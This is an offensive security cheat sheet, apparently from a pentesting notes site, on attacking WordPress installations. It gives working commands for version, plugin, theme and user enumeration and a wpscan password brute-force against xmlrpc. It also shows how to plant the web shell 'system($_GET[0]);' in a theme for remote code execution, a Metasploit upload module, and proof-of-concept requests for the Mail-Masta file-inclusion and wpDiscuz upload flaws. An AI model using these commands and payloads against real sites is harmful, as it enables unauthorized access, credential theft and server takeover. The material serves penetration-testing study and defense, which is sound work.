View on GitHub
Edit

WordPress

User Role
Description

Administrator

Full Privileges - This user role is an interesting target due to his capability of managing plugins

Editor

Can publish and manage any user's posts - This user role is an interesting target due to his capability of managing plugins

Author

Can publish and manage their posts

Contributor

Can write and manage their own post, but he cannot publish them

Subscriber

Can view posts and manage/modify their profile

Getting access to an administrator is usually sufficient to obtain code execution on the server. Editors and authors might have access to certain vulnerable plugins, which normal users don’t.

WordPress Discovery/Footprinting

Manual Identification:

  • Check if the robots.txt file contains any wordpress entry

  • Check if /wp-admin, /wp-content, xmlrpc.php or wordpress-related artifacts exist.

  • Search the WP version inside the page source code: curl example.com | grep '<meta name="generator"'

  • Search the WP version inside the css or js files: curl example.com | grep '?ver='

  • Find the version inside readme.html (only works for old ones)

Identification using WPScan:

  • wpscan --url example.com --enumerate --api-token TOKENVALUE

Plugins Enumeration:

  • curl -s -X GET https://example.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/plugins/*' | cut -d"'" -f2

  • You can also try enumerating whether a plugin is in use by navigating to the plugin's directory and checking whether the web application redirects to the complete folder (via a 3XX redirect) curl -I -X GET http://example.com/wp-content/plugins/mail-masta <- misses the last /

  • If the application answers with 3XX redirect, the plugin exists. If it answers with a 404, it does not.

This technique allows you to find installed plugins, which could be deactivated.

Themes Enumeration:

  • curl -s -X GET https://example.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'themes' | cut -d"'" -f2

User Enumeration

Some versions of WordPress logins allow enumerating usernames due to verbose error messages stating whether a username is right or not.

Alternative methods are:

  1. Use the ?author= GET parameter to check whether the page redirects you to a valid user's page: curl -s -I http://example.com/?author=1

  2. Check usernames inside the wp-json users file: curl http://example.com/wp-json/wp/v2/users | jq

After you found a valid username, you can use wpscan to bruteforce a valid user's password: sudo wpscan --password-attack xmlrpc -t 20 -U admin, sfoffo -P /usr/share/wordlists/rockyou.txt --url https://example.com

Some WordPress instances may lock-out a user after few invalid attempts

Admin User - Remote Code Execution

An aministrator account may edit PHP code in order to gain RCE. Note: when editing an active theme or plugin you may encounter errors. Deactivate them first.

The steps are the following:

  • Semi-automatically, using msfconsole: use exploit/unix/webapp/wp_admin_shell_upload

  • Manually, by modifying a theme:

    1. Login as administrator. Navigate to: appearance → side panel → theme editor → select a theme

    2. Add the following to the theme: system($_GET[0]);

    3. Use the following URL to gain RCE: http://example.test/wp-content/themes/THEMENAME/FILEPHPNAME.PHP?0=id

WordPress Known Vulnerable Plugins

  1. Mail-Masta allows LFI by using the following PoC: curl -s http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

  2. wpDiscuz allows RCE by using the following PoC:

    • ExploitDB: python3 wp_discuz.py -u http://blog.inlanefreight.local -p /?p=1

    • if it fails, use cURL to execute commands using the uploaded web shell: curl -s http://blog.inlanefreight.local/wp-content/uploads/2021/08/uthsdkbywoxeebg-1629904090.8191.php?cmd=id